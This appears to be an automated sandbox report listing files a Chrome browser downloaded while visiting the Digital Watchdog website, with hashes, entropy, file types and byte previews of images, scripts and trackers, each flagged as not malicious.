                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/assets/img/banner/DW-DW-Spectrum_Banner.mp4:2f94f19b59439e:0
                                                                                                                                                                                    Preview:....ftypmp42....mp42mp41...dmoov...lmvhd......vv..vv.._.....................................................@...................................trak...\tkhd......vv..vv............................................................@..............$edts....elst.......................2mdia... mdhd......vv..vv..u0...Y.......@hdlr........vide.............Mainconcept Video Media Handler....minf....vmhd...............3hdlr........alis............Alias Data Handler....$dinf....dref............url .......Wstbl....stsd............avc1.............................H...H.........AVC Coding............................,avcC.M@2....gM@2....'.|.@...@.:.!...h.<.....stts...................(stsc....................................stsz...............(...............}...|.......'...M......"...A...R\.....................YK.......m......._.......U...;......)......F..J........ ...................................e..N)..F...H=..k...S...K.......bm..Z...Y6..k....+..n...TI.._...W...g...Ao../...4...7H..5...;.......D
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 567 x 567, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):10412
                                                                                                                                                                                    Entropy (8bit):7.819110138639949
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:EF1CF2C8E3774CC3489357FB4216CE8D
                                                                                                                                                                                    SHA1:B759C0820E57D257710135B76B80D7C57E81D871
                                                                                                                                                                                    SHA-256:877266440B5531E5684B3FA3A739384A9980CAA54C897D2B07AE4CA157A6B540
                                                                                                                                                                                    SHA-512:BA11E81ED0EBE7A4AFBA3B23C76F2D1C56C0E12AA5E72F07AE96E9A2A01E78626F34AAFD49AACE05D7B3D24C4A849D809E44758BAE2514E82A0EF36F2F831478
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/product_detail_assets/facebook_orange.png
                                                                                                                                                                                    Preview:.PNG........IHDR...7...7.....g(z.....tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Macintosh)" xmpMM:InstanceID="xmp.iid:F893417D50CD11EDA3C588EE09F49F97" xmpMM:DocumentID="xmp.did:F893417E50CD11EDA3C588EE09F49F97"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F893417B50CD11EDA3C588EE09F49F97" stRef:documentID="xmp.did:F893417C50CD11EDA3C588EE09F49F97"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...B..%.IDATx...?.\Gb....W..{Z.&..j.Jl@.(.B6./....l.,.G.,v.`.;...]pN4c.ptP+Xgw.='........`....,C.s..:[.y.f.Q......_U
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65487), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):427326
                                                                                                                                                                                    Entropy (8bit):5.259446126515893
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:2DD54D775AFE9987B075B52DDD33A16E
                                                                                                                                                                                    SHA1:CA4BEF69494243B7ED217B695824E89FEB2DBF9A
                                                                                                                                                                                    SHA-256:2E1D8BAEE4067A7C5A56EC73C72BD51DE51156722960D079C374A584F0D73C6A
                                                                                                                                                                                    SHA-512:8C266B1A7CBB0179F964FE13F8F6BA08E44981FEB204A761CB501CE000D12E2286946B7490F22FFFA6A2E5B7BDD2CDBADCFF53480FAB7ACFC34DC63CB5D10304
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/tinymce/tinymce.min.js?20250530073516
                                                                                                                                                                                    Preview:/**.. * TinyMCE version 6.7.2 (2023-10-25).. */..!function(){"use strict";var e=function(e){if(null===e)return"null";if(void 0===e)return"undefined";var t=typeof e;return"object"===t&&(Array.prototype.isPrototypeOf(e)||e.constructor&&"Array"===e.constructor.name)?"array":"object"===t&&(String.prototype.isPrototypeOf(e)||e.constructor&&"String"===e.constructor.name)?"string":t},t=function(e){return{eq:e}},n=t((function(e,t){return e===t})),o=function(e){return t((function(t,n){if(t.length!==n.length)return!1;for(var o=t.length,r=0;r<o;r++)if(!e.eq(t[r],n[r]))return!1;return!0}))},r=function(e){return t((function(r,s){var a=Object.keys(r),i=Object.keys(s);if(!function(e,n){return function(e,n){return t((function(t,o){return e.eq(n(t),n(o))}))}(o(e),(function(e){return function(e,t){return Array.prototype.slice.call(e).sort(t)}(e,n)}))}(n).eq(a,i))return!1;for(var l=a.length,d=0;d<l;d++){var c=a[d];if(!e.eq(r[c],s[c]))return!1}return!0}))},s=t((function(t,n){if(t===n)return!0;var a=e(t);r
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 270 x 56, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6134
                                                                                                                                                                                    Entropy (8bit):7.957750428480742
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:DC736F619C9A770D34570D15B19D8561
                                                                                                                                                                                    SHA1:AF8877129B9178E30DCB484BFF6DF0423B7599C4
                                                                                                                                                                                    SHA-256:1BE942C164A5214F3BD8640334A6677BEDB3E5F41609B4E54B08933B7675F637
                                                                                                                                                                                    SHA-512:E71AAA72FE4BF777F59FC728B9AF016A1A00B744172DF669754A34FA1B239D7F0DC144A2F583A89A34A9880413E93AFEB42C3DB1E74734797AF0715F33C70573
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:.PNG........IHDR.......8.............pHYs..........o.d....tEXtSoftware.www.inkscape.org..<.....IDATx..y..U....^wg7IgO.C.#...a.4Q..AtTd.q..H.m.Aq......TF.q.I..AQGT..P...&.$ . !vg.N...I.Ww....U.........N^j..^...~.UZk....(...b.....#w9.......p.v..p.H].(.9......Bp....{..="W1:y.p...L...f5=..TP....1<."Z.c...$...{...`4......G.BF............\...g;..:...TF.ZF..F.....!D.(|....&...e@.c.p.)C..b|...{........8..WE8vD...AT....9...ho..z......J@..$rC..9....3....c....>.......e......K..:>.:..G.pSl.1....~.8..M....#Z...+......Q..!N.\.<.&...D.OA..&.._......8.X.DB*.V...Ssw....U..1......!.}.0....o.b.|I.]8...j.@..y.:x.R>4......K......e.*..#..u..uL..W.h....ik....T.j..jr...1..5_.t.s.8.x../.vF,.....nD........!......!?2..u...\..8s..F..q\....../..'.W..........8..M......?......4D....(..r..C..x.q._...........A.....4+Ll......>....8.H=GM.....#.@e...]...I.....A..>..'.....5..;..G.L..U:.C..j.&.|;........VA.Z.G..g.>..;.{.c.3.^.#..g.hd.;....%p...R..,cT...Y.....`E.z.2..(...\F6.....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=676, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=883], baseline, precision 8, 883x676, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):348547
                                                                                                                                                                                    Entropy (8bit):7.912699479962154
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:806B4C50119D1C614E7D76694D395916
                                                                                                                                                                                    SHA1:FCD729E245DF7B4E3E109B206B25A577606B58B2
                                                                                                                                                                                    SHA-256:03DD8EFE06AF31E0235129038FD50387E7A532A93EB07293EF01A24586B4375E
                                                                                                                                                                                    SHA-512:CB07587B8BE128CE07B298772002CFCAB9C86D77D053796EB413186B622BBD96D31DD4904282DB914244F3B0B161574374E8809FEDE45C908566A34A539FEBF1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:......Exif..MM.*...............s.......................................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop 22.0 (Windows).2022:07:06 21:38:36............0231.......................s...........................................n...........v.(.....................~.........../.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...c>.},L.....zo{A,..{w8.7..~...]G.G.*...o.Ept6q..hkl...t~.r..;]94.,'..._.o....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (64130), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):70892
                                                                                                                                                                                    Entropy (8bit):5.314988221458824
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:D99057CBC365C17C70C3B0D3DA7F273B
                                                                                                                                                                                    SHA1:AAD6E79B1E9F9F12BE1CC8EEC8CA242AE5F23A41
                                                                                                                                                                                    SHA-256:4154C46EC7BE875EC7FF33453C62A7A5F591B7B6D93FB60CF5FC597768215E73
                                                                                                                                                                                    SHA-512:5FCECC3D22B7C57FA2EE18549973E4C20BF19592AEFE292B97DEEA02F169E87570D96CC4AF2C95B97400680C792EF15A01E5B0BB15B98623227E461EFC42DCF5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/library/select2/js/select2.min.js
                                                                                                                                                                                    Preview:/*! Select2 4.0.13 | https://github.com/select2/select2/blob/master/LICENSE.md */..!function(n){"function"==typeof define&&define.amd?define(["jquery"],n):"object"==typeof module&&module.exports?module.exports=function(e,t){return void 0===t&&(t="undefined"!=typeof window?require("jquery"):require("jquery")(e)),n(t),t}:n(jQuery)}(function(u){var e=function(){if(u&&u.fn&&u.fn.select2&&u.fn.select2.amd)var e=u.fn.select2.amd;var t,n,r,h,o,s,f,g,m,v,y,_,i,a,b;function w(e,t){return i.call(e,t)}function l(e,t){var n,r,i,o,s,a,l,c,u,d,p,h=t&&t.split("/"),f=y.map,g=f&&f["*"]||{};if(e){for(s=(e=e.split("/")).length-1,y.nodeIdCompat&&b.test(e[s])&&(e[s]=e[s].replace(b,"")),"."===e[0].charAt(0)&&h&&(e=h.slice(0,h.length-1).concat(e)),u=0;u<e.length;u++)if("."===(p=e[u]))e.splice(u,1),u-=1;else if(".."===p){if(0===u||1===u&&".."===e[2]||".."===e[u-1])continue;0<u&&(e.splice(u-1,2),u-=2)}e=e.join("/")}if((h||g)&&f){for(u=(n=e.split("/")).length;0<u;u-=1){if(r=n.slice(0,u).join("/"),h)for(d=h.leng
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 22.0 (Windows), datetime=2022:07:06 19:10:52], baseline, precision 8, 883x676, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):209352
                                                                                                                                                                                    Entropy (8bit):7.5655308579132665
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:F2E723DA493FB28486E543EC00FF5EAA
                                                                                                                                                                                    SHA1:5776CC1C039CCA46A3C81AE6FC4EE252DE4A3F45
                                                                                                                                                                                    SHA-256:F18E6284338828C48F7FDFE3FC95481D59C6E74D51ABC66DF0A422886B440F12
                                                                                                                                                                                    SHA-512:B0AA70E1DA67A302A5D6E5C5FCB8B17D32BC3B1965D153C4F4FE2F2287688F5F286FD5963A90F759078F54E97C18386EE54B25E4E146A50DD505AE242DCD9901
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 22.0 (Windows).2022:07:06 19:10:52.............................s..........................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....j..N..N.:J]$...$.t...N...I$.'I$...N...I$....RL.1r..'IK.L.%..d.t.I%..d.)t.'IK..$..u..)t.%)).....yL\.:.....S.<j....X..M...9.F7..i..l..WW...o.?..\nO
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 73x73, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):5389
                                                                                                                                                                                    Entropy (8bit):7.742220862109775
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:2254F5E4C1EA8518C325DEF56E6BFE32
                                                                                                                                                                                    SHA1:F962D9ABD722FB6DDCF24977585BFAC80445CBEA
                                                                                                                                                                                    SHA-256:3C257BEAD062603EFAC23178A9DA0C9A855A1804B23B1A3C951E1F9484C338FA
                                                                                                                                                                                    SHA-512:CFF91984D0F7F8A3C4065801DEFC34CD47E4CB6354B11DC88C4CF4A1A94655A79C9E1FA0BF15BF175FD4B9BB24333BE6E902BDA661AE7348D732CB50EE4B714D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:OriginalDocumentID="uuid:9E3E5C9A8C81DB118734DB58FDDE4BA7" xmpMM:DocumentID="xmp.did:735B72E2477211ECB8BDB3060B8AFEEC" xmpMM:InstanceID="xmp.iid:735B72E1477211ECB8BDB3060B8AFEEC" xmp:CreatorTool="Adobe Illustrator 24.3 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0e7e163f-387d-5640-8525-967c941de0a4" stRef:documentID="adobe:docid:photoshop:4426e061-dcdc-aa44-9118-671f329bebaa"/> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">DW_HomePage_JC</r
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):370
                                                                                                                                                                                    Entropy (8bit):7.331430693178776
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:1A2F95A98C8BF56D60D90B1C9B3A2287
                                                                                                                                                                                    SHA1:002970A8CB0649FF7F2D70D0F56DDA2C043AA18F
                                                                                                                                                                                    SHA-256:9658040BD8C5B8698C5A116C28DC39C2E56FB0C0D70745E35E359428AB22BAEE
                                                                                                                                                                                    SHA-512:CCBF456D795B5A93D4EC4213F391BE95D3614414A36930BB5AFA93FEEC0AAC298E8E0FCC17FC9369BBF4C2C5AD7AD658D10AAF9B0CC7B3012976C8CB3D4CACF4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/bootstrap-tagsinput/0.8.0/bootstrap-tagsinput.css
                                                                                                                                                                                    Preview:.N.....[...%....R.M...TE.A.t..w?y..F?../...7..h.S..&.....|......i.;..t........t}.......@a3..]N...0.O.._7...O.]0......uC.........NA.......E.i.,.(.s^:.s..?...s.Y.o.......U2.c..Iw..Ds.Fa..6...|......m`.A.Vf.ua.......d.+.6:\.d..m...P.4O..UU....f`.....1....1.&.<16..;.... K...6.X6-K,T..a......M....-B.t.v..jX.<d|1\.k.Q..J..@...........E......... .f.&.`..Of.1..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (11486), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):12244
                                                                                                                                                                                    Entropy (8bit):6.040085171643977
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:CF89143BBC36391DE81FD9AB81D6871F
                                                                                                                                                                                    SHA1:DCDAEEB5841E876CF25543EF611709F437D0FA19
                                                                                                                                                                                    SHA-256:279DF81BBF9DA9427CB3DBB74D71FA543D95014670D6C307C7350269891E0FB1
                                                                                                                                                                                    SHA-512:6D7622948890E858163718B3FC279FCE1CCECD53EC6EF4B5CDC0EE54BC730A1E5DE2D3CFF97D74DEB3188101D1AAB4187FB76F1B34A1C27C9B28050999831040
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/library/Cookie-Alert/cookiealert.css?20250530073516
                                                                                                                                                                                    Preview:/*.. * Bootstrap Cookie Alert by Wruczek.. * https://github.com/Wruczek/Bootstrap-Cookie-Alert.. * Released under MIT license.. */...cookiealert {.. position: fixed;.. bottom: 0;.. left: 0;.. width: 100%;.. margin: 0 !important;.. z-index: 999;.. opacity: 0;.. visibility: hidden;.. border-radius: 0;.. transform: translateY(100%);.. transition: all 500ms ease-out;.. color: #ecf0f1;.. background: #212327 url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEECAIAAAAd4J55AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyhpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8x
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):101191
                                                                                                                                                                                    Entropy (8bit):7.994405571565324
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:336A6229227991BA060643CBD08D466B
                                                                                                                                                                                    SHA1:17F5CFDB70D3F6B07952333F8C215D61DDD582AB
                                                                                                                                                                                    SHA-256:F4AF47C6B39D2E95F14445807CBCF30C3834046E302FA3156DA9ABEF0943F7B6
                                                                                                                                                                                    SHA-512:E0BF807989CDCCE1972F50AC88F74888601CD8B10E967747E1B11ADA77548E55D8520E9B9EF410DA0D8E8D75AE6E978750ABCADF1A0098A2DA26A1C8258C4FDE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtag/js?id=UA-47457883-1
                                                                                                                                                                                    Preview:(./...D..4..^.Gv.2.D..<`.J..k.iwI.....8..\.y.....W..TH....G.].Q|.s........Y.......2M}u..Fo....f......z........X...`..{..;......ey.............^..9...............|.,..T......4Qi.2V....%.M.......Q.>\...y...z\KPHR...F6....\.i..'.7...:4`.i......5M..0fi.{{.......^G.W.?..6EqO+z).N..S.Z.JNr#+~.5....U.......q.49......l.c"98.H..P.....p......Q|..#.1.(.i.v.).ijU.AL.a......nu.^.;.\_..|..NS.l..4YJ9.c....U.R-..^.......~^..^.....{(...~..\q.HR.fk....U...Km.=(=xI7.j....a..*..=N.....z.k..GV...'*....<.uu..B..;.......=.o].....#..[..=.o]..H<..d..F............Z*....D%1*<...#...=.?z4..bq.9..9...W?.te.g......HR.O..W._v>. M...#.....^..IJ..kp.K.y.._......h.K..(....E.....^..........NF..,.(.#i.l.8....MF..4h00.............x.00.....S!.!ATH`6.).B3!!..LLd`H....G..2.......`d$4...B..L@T\XH...NF....8.....G.p.....x.H....GB..h.H....D....h.p$..T..s..&0...Is..q.XH....A....*(.....A..X`H...i.i..\`&...A.H...RC...i( YL`0......T8H...G.p0...Br.\H....BB.q!]44`$...d@.p6...$!.... (*.8..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):937
                                                                                                                                                                                    Entropy (8bit):7.807069946737675
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:C42D9FC57A9F91FE0C73A8489904A7D7
                                                                                                                                                                                    SHA1:FEE4B9AE26495BE728053425D5ECA3753D0E83AE
                                                                                                                                                                                    SHA-256:D899B7F22990B6B98FDB0478692C00D31FDF6E7FD9DDD0992C11C5ADBC046E7C
                                                                                                                                                                                    SHA-512:ACA0B1FC0E8D246010DF26B71ACA0FF9CEE0D62AD947D9A8A98FA8C52E19FA91D9D57C86D6ABC1F0BB6DEDBAC09137B2AAD7DE0B4E185404EB8EB495949BDD65
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://td.doubleclick.net/td/rul/456244667?random=1748615717986&cv=11&fst=1748615717986&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be55s2v899007962za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&ptag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&u_w=1280&u_h=1024&url=https%3A%2F%2Fdigital-watchdog.com%2F&hn=www.googleadservices.com&frm=0&tiba=Digital%20Watchdog%20l%20Welcome&npa=0&pscdl=noapi&auid=2004574435.1748615718&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                                    Preview:.....o?....w-.....fK+...u....r.WK..1..=ll. Q.Z.&.h..g.:.3.740.%A..M....o......Y%..Y..sX..E(H>...3$.......A.Y. A........2..w)H.`...~i.......$dHnH. .O...~.y.o:.....:. ........'Y...KSk<Q.@q..Nh._.!7...f...E..9.m....l......aj_?....s99r..9.z|r...&V....|..4...s.^... 0D..#... xC*5.J...]......R7........"...$........v.@.D..:8...B.-.^........f.0.\tT.........S.G(.*......0....Z...n.{8t....u.<.......s..f/g....b.?=:;9}./.\R..s}.t}xt....i.Q..{$d7$...R7=.........P........ ...1.. ...'.w.@.(O..$o.QH`t.>..'..q..... ....P)z...).m.....{....h...O...)J.....:.O..UK...h.1^..$/.m.BT}.Ns.....e...A.N..C.A.Y.x....r...rH....#..U....m#Ue...2...Q..`....f)..[.:h.B...@.8.J*..[y.{......A.$..c..&.;..d..y...."|U...=.2.Q..&g.@.........B..I..B....V.j...._=.`.>Y.rP1.!6."K61'..k-.kQ...)Wvv..:#C6.I......s5..f.U.....q.....N...!.pS......1.....f..g.b.......GL;...gM.m.B.Iz*u.....3...E6.|...;.B.....*X......h-E...........y:...,..1..3..i....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 3000x1264, components 3
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1346973
                                                                                                                                                                                    Entropy (8bit):7.969085584939931
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:492EBFF59EF8150E68CAF4C534A889F8
                                                                                                                                                                                    SHA1:378093FA50B91620D08EC01CF468CA5AEFDDB312
                                                                                                                                                                                    SHA-256:6F1BEAA857B0E4C223B8E1F71191C509DADDC6C90CBA523A050AABA8812284BA
                                                                                                                                                                                    SHA-512:6666534C42F4EC5D21DEE4412989232F7A53D4911BC381C38CE3B49AE34A7ABE350A241188B58A684721F2A73E425CE4AA6F23974B0C9AE8973F49AA4162AA27
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/assets/img/banner/DW-Blackjack-Ai_Banner_Rav2.jpg
                                                                                                                                                                                    Preview:......Exif..II*.................Ducky.......Z......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:OriginalDocumentID="6B7D3962444967FA4F23B38495BB038D" xmpMM:DocumentID="xmp.did:C16AE3294A5911EF964FCC19CD94D193" xmpMM:InstanceID="xmp.iid:C16AE3284A5911EF964FCC19CD94D193" xmp:CreatorTool="Adobe Photoshop Lightroom Classic 7.0 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:904d7170-0d8a-cb4b-be2a-6fff3ed16071" stRef:documentID="adobe:docid:photoshop:68b3a990-bed6-9e41-9aa0-f458c9d85819"/> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">BANGK
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 61505
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2842
                                                                                                                                                                                    Entropy (8bit):7.910027687979323
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:78378B905FE8017E4E2C9A5CEB06C38A
                                                                                                                                                                                    SHA1:1FE6472B890BB841FD821EF156E4149738873D00
                                                                                                                                                                                    SHA-256:3AB992BAD0FDA3A81AE590B31C440913486F81C0218F6B63FA73682131420DA3
                                                                                                                                                                                    SHA-512:027B4C23B9A0B462125D39F3CCD0128F2CF83B301034094545496A2189A51FF0B1284E98F9657EC3C6F42EC799A2064EAFA9AC02A17545CA471454835AD7F60F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:"https://fonts.googleapis.com/css?family=Google+Sans:100,300,400,500,700,900,100i,300i,400i,500i,700i,900i"
